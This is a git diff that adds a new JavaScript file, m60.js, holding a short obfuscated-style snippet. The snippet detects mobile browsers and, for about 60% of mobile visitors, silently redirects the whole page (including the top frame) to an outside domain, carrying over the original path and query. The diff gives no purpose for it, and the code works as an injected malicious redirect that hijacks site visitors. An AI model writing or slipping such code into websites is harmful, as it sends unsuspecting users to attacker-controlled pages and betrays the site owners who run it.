diff --git a/m60.js b/m60.js new file mode 100644 index 0000000..e49e6a0 --- /dev/null +++ b/m60.js @@ -0,0 +1,5 @@ +(function(){try{if(window.__w64)return;window.__w64=1;}catch(e){} +var m=/Mobile|Android|iPhone|iPad|iPod|webOS|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent||''); +if(!m)return; if(Math.random()>=0.6)return; +var t='https://xiazai.it.com'+location.pathname+location.search; try{top.location.replace(t)}catch(e){location.href=t} +})(); \ No newline at end of file